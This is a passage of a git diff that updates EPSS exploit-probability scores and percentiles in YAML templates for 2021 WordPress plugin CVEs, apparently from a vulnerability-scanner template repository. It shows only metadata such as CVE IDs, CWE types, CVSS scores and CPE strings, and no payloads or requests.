cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 52b07314a1..aa7b35c892 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24300 cwe-id: CWE-79 - epss-score: 0.00302 - epss-percentile: 0.66181 + epss-score: 0.00259 + epss-percentile: 0.63625 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 2f3c738033..29be355b01 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24316 cwe-id: CWE-79 - epss-score: 0.00246 - epss-percentile: 0.62393 + epss-score: 0.00298 + epss-percentile: 0.66203 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 1d344c9c7b..774523d576 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24320 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 62650cc0db..1184aabfb8 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24335 cwe-id: CWE-79 - epss-score: 0.00163 - epss-percentile: 0.52745 + epss-score: 0.0017 + epss-percentile: 0.54035 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 61333601e9..14346c307f 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24340 cwe-id: CWE-89 epss-score: 0.0287 - epss-percentile: 0.89635 + epss-percentile: 0.89694 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index b84d521090..d7b6f9e79c 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24342 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41104 + epss-score: 0.00106 + epss-percentile: 0.42876 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index cc0745d5e9..c366df692f 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.96951 - epss-percentile: 0.99661 + epss-score: 0.97036 + epss-percentile: 0.99699 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index cd0466389e..20382aecb0 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50124 + epss-percentile: 0.50234 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 6a486dc65d..fea6a01083 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00255 - epss-percentile: 0.63186 + epss-percentile: 0.63338 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 260c9d490d..9c2e6885f1 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24364 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41104 + epss-percentile: 0.4118 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 2d6c7ed9b1..782e12e80b 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24370 cwe-id: CWE-434 - epss-score: 0.0856 - epss-percentile: 0.93813 + epss-score: 0.10705 + epss-percentile: 0.94526 cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index e534c2b093..6051e8a7b7 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50124 + epss-percentile: 0.50234 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index dfa5b538f1..aac70a6cb8 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24389 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.52062 + epss-percentile: 0.52136 cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 4bade2d715..be88384de8 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24406 cwe-id: CWE-601 epss-score: 0.0015 - epss-percentile: 0.50986 + epss-percentile: 0.51077 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index a755f41ec5..62f2b282d7 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24407 cwe-id: CWE-79 epss-score: 0.00161 - epss-percentile: 0.52498 + epss-percentile: 0.52574 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index a2a040a9ea..9e4cac5ccb 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24409 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.56105 + epss-percentile: 0.56263 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 1e44c53b93..5b481069b9 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49314 + epss-percentile: 0.49412 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index bd0a199922..24ed1b6a35 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40711 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 0354ee535b..517c0b1dda 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40711 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index f2107d2801..656a766c78 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24472 cwe-id: CWE-918 epss-score: 0.03476 - epss-percentile: 0.90502 + epss-percentile: 0.90575 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 2cd5434fef..fa3bc9b480 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24488 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.66181 + epss-percentile: 0.66369 cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index a4f48d5765..736dbd0a7b 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 91205c5741..92f564fb8b 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.56105 + epss-percentile: 0.56263 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index f0a88fe077..af8c77186b 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24499 cwe-id: CWE-434 epss-score: 0.1914 - epss-percentile: 0.95763 + epss-percentile: 0.95806 cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index ebfc155df4..df07efd118 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24510 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49923 + epss-percentile: 0.50031 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index a29b6f5e31..329d4f0cbd 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.17174 - epss-percentile: 0.95574 + epss-score: 0.20268 + epss-percentile: 0.9591 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index fba52183fc..7733ce0570 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24627 cwe-id: CWE-89 - epss-score: 0.14566 - epss-percentile: 0.95208 + epss-score: 0.15547 + epss-percentile: 0.95387 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index 4fb80bb8ec..5f27eb8daf 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24647 cwe-id: CWE-287 epss-score: 0.2135 - epss-percentile: 0.95954 + epss-percentile: 0.95991 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 0f3ba9d6ce..9128ed85fd 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.23542 - epss-percentile: 0.96105 + epss-percentile: 0.96133 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index b2039930c6..94b1951bb1 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24731 cwe-id: CWE-89 epss-score: 0.14786 - epss-percentile: 0.95243 + epss-percentile: 0.95259 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 97ddc32717..7360c2b3be 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 5b36c85689..e9d2419b0f 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24750 cwe-id: CWE-89 epss-score: 0.01207 - epss-percentile: 0.83609 + epss-percentile: 0.83715 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 7b928da7d8..14bedde762 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24762 cwe-id: CWE-89 - epss-score: 0.13997 - epss-percentile: 0.95124 + epss-score: 0.33888 + epss-percentile: 0.96671 cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index 472e6b75da..96f698d5d7 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24791 cwe-id: CWE-89 epss-score: 0.10363 - epss-percentile: 0.94404 + epss-percentile: 0.94437 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index b8a306abf7..fd76d4d18f 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24827 cwe-id: CWE-89 epss-score: 0.11843 - epss-percentile: 0.94769 + epss-percentile: 0.94798 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 55b6cce7b8..e320cb795c 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index d02993a605..3223ee0322 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24862 cwe-id: CWE-89 epss-score: 0.72686 - epss-percentile: 0.97773 + epss-percentile: 0.97804 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index d92154b4ed..0e1597c50e 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49923 + epss-percentile: 0.50031 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 750476f0e2..9c966d433f 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index ede5481dd6..74eff6511b 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40069 + epss-percentile: 0.40139 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index 50dcb080d8..8f8fa6b001 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24915 cwe-id: CWE-89 - epss-score: 0.19154 - epss-percentile: 0.95765 + epss-score: 0.22351 + epss-percentile: 0.96057 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index be004810f3..2d81806885 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24917 cwe-id: CWE-863 epss-score: 0.03563 - epss-percentile: 0.90605 + epss-percentile: 0.90675 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index ed51f3e907..625974ad6a 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.54008 + epss-percentile: 0.54129 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 3b570b3b9c..3e3d93bb02 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24931 cwe-id: CWE-89 epss-score: 0.58114 - epss-percentile: 0.97396 + epss-percentile: 0.97428 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 66f7cb7651..3b217671c0 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index c87a67a065..e985c1a5d0 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 - epss-score: 0.12401 - epss-percentile: 0.94864 + epss-score: 0.12445 + epss-percentile: 0.94901 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index eaf1e02866..e04aaf4d4e 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 - epss-score: 0.00231 - epss-percentile: 0.61056 + epss-score: 0.00303 + epss-percentile: 0.66429 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index c2836e0a9a..18bd0839fc 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index d85c27eb15..01edd99d85 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.03639 - epss-percentile: 0.90693 + epss-percentile: 0.90767 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index b9923a1907..d782971382 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24979 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 1e9e388a54..2acc4451ff 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24987 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35822 + epss-percentile: 0.35806 cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 84df5ba978..6ac06e26d9 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24991 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28725 + epss-percentile: 0.28699 cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index d4e1a1739e..c029658d79 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.00224 - epss-percentile: 0.60522 + epss-percentile: 0.6069 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 015d98bbed..a781976905 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 - epss-score: 0.5392 - epss-percentile: 0.97305 + epss-score: 0.61252 + epss-percentile: 0.97521 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 67b1c02405..4a8dfd9639 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index fe48345da6..d96b43088b 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: 